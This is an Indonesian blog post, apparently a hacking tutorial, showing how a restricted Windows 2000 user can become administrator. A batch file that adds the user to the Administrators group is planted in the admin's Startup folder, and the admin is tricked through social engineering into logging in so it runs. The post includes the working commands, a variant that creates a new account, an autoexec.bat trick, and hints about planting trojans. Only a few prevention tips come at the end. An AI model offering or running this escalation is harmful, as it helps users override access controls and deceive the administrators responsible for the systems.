Kita sering kesal karena tidak bisa masuk ke control panel ? Tidak bisa install program baru karena system anda diproteksi oleh admin ? Justru kekesalan itulah yang memberikan dorongan kreatifitas untuk mendapatkan ide meningkatkan permission userid yang kita gunakan. Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya
dengan beberapa langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya "NEPU")
Cek terlebih dahulu permission (group user) anda:
Langkah yang perlu dilakukan adalah sbb:
Start > Run > CMD , gue ketik deh ; net user
Hasilnya:
C:\Documents and Settings\RIDHO>net use
User accounts for \\UNKNOWN
-------------------------------------------------------------------------------
__vmware_user__ Administrator Guest
HelpAssistant RIDHO SUPPORT_388945a0
The command completed successfully.
Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik lagi; net user RIDHO
C:\Documents and Settings\RIDHO>net user RIDHO
User name RIDHO
Full Name
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 6/21/2005 9:12 AM
Password expires Never
Password changeable 6/21/2005 9:12 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/19/2005 10:10 PM
Logon hours allowed All
Local Group Memberships *Power User
Global Group memberships *None
The command completed successfully.
Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue gak bisa nginstal program2 kesayangan gue ? hemm.... Tunggu aja luh admin brengsek dan pelit, tunggu aja tanggal mainnya! He..he..h.e......
Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32, huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu? salah satu contohnya adalah dalam FAT32 seluruh user yang login
pada OS tersebut dapat mengakses setiap profile yang ada di bawah direktori document and settings termasuk seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?...
Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,
1. Pertama kita buat batch file untuk mendaftarkan local account kita
untuk dijadikan account Maha Dewa yaitu ADMINISTRATOR alias sang
pengatus semuanya gitu loh!
Kita gunakan command net localgroup, perhatikan batch file di bawah ini
----------------------------------start------------------------------
@echo off net localgroup Administrators RIDHO/add exit
----------------------------------end-----------------------------
ketikkan script tersebut di notepad lalu save as dengan nama admin.bat
2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi sang Admin yang PeLiT he..h.e...he...he..
Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan admin.bat pada direktori startUp administrator pada alamat berikut ;
C:\Documents and Settings\Administrator\Start Menu\Programs\Startup
Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara otomatis begitu sang admin login dengan accountnya, maka seketika itu account RIDHOyang cuma punya pangkat Power User maka pada saat itu juga RIDHOsekaligus mempunya 2 pangkat, yaitu Power User dan Adminsitrators he...he.... Ketika kita menjadi sang Maha Dewa, you know what should you do next! ?
FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:
-----------------------------------start---------------------------------
@echo off net user user_name_kamu /add net localgroup Administrator
user_name_kamu /add exit
------------------------------------end---------------------------------
Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh kapan nih si doi login dan kemakan perangkap gue?.... bisa botak nih nunggunya!) saran gue sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau masalah kecil si IT Helpdesk login admin dulu
untuk ngecek segala sesuatunya, maklum kalo login di user biasa serba terbatas hi...hi...hi..hi... jadi dari modal pengalam gue mudah mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita... dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang instal AAtolls buat scaning PC si admin wakakakkakak...... atau instal Trojan Client di situ yang
nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu yang turut membantu niat jelekmu! "Merusak pekerjaan banyak orang, memperbaiki pekerjaan segelintir orang, mudah -mudahan komunitas ini menjadi segelintir orang itu, amieenn...."
Artikel ringan ini cuma buat para newbies aja yang kesel sama tindakan admin yang semena mena dan tidak adil, setidaknya ada beberapa pelajaran yang dapat di petik walaupun sesederhana apapun, mudahan dapat menjadi pelajaran yang berharaga. Berikut ini pencegahan yang perlu di lakukan:
1. Enkripsi NTFS lebih baik dari pada FAT32 terutama untuk sekurity dan manajemen file. (oh iya!.. walaupun pake NTFS kita bisa manfaatin autoexec.bat lhoo... untuk eksekusi file admin.bat tadi he..he..he... No Perfect System In The World Man!! )
2. Sebaiknya Proteksi program program administrasi berikut ini; Regedit, MSCONFIG, GPEDIT.MSC, CommandPromt dan semua program administrasi lainnya yang memungkinkan user memicu file2 kurang ajar di exekusi OS secara otomatis, sengaja ataupun tidak di sengaja.
3. Password BIOS, dan set boot sequence hanya dari hardiks saja, ini mencegah user tidak bisa booting dengan device lain, karena banyak program bertebaran untuk mereset password sang mahadewa, salah satu contohnya dengan Offline NT Password Recovery. (kecuali user nekad banged mencopot baterai CMOS dengan membongkar PC, gile usaha banged dah!!!)
4. Untuk sang admin, sering sering di cek donk kalo ke usernya, kalo udah kecolongan cepet2 di turunin lagi tuh pangkatnya, dan yang sering banget kejadian nih buat temen2 gue kalo login admin, DI LOG OUT DONK!!!!!! jangan ditinggal gitu aza!
Langganan:
Posting Komentar (Atom)
Ayah, Anak dan Keledainya
Mungkin legenda tentang Ayah, Anak dan Keledainya sudah sering kita dengar dan kita baca dari banyak media, tidaklah buruk jika saya s...

-
Sebenarnya topik ini udah lama banget, tapi nggak ada salahnya ingin sekedar sharing tentang peta interaktif 3D dengan foto Satelit. Dengan ...
-
PlaySMS - SMS Gateway PlaySMS is a flexible Web-based Mobile Portal System that it can be made to fit to various services such as an SMS gat...
-
Layaknya dalam film-film action yang berlatar belakang mafia, aktivitas komunitas underground khususnya haker memang sulit di endus, berbaga...
Tidak ada komentar:
Posting Komentar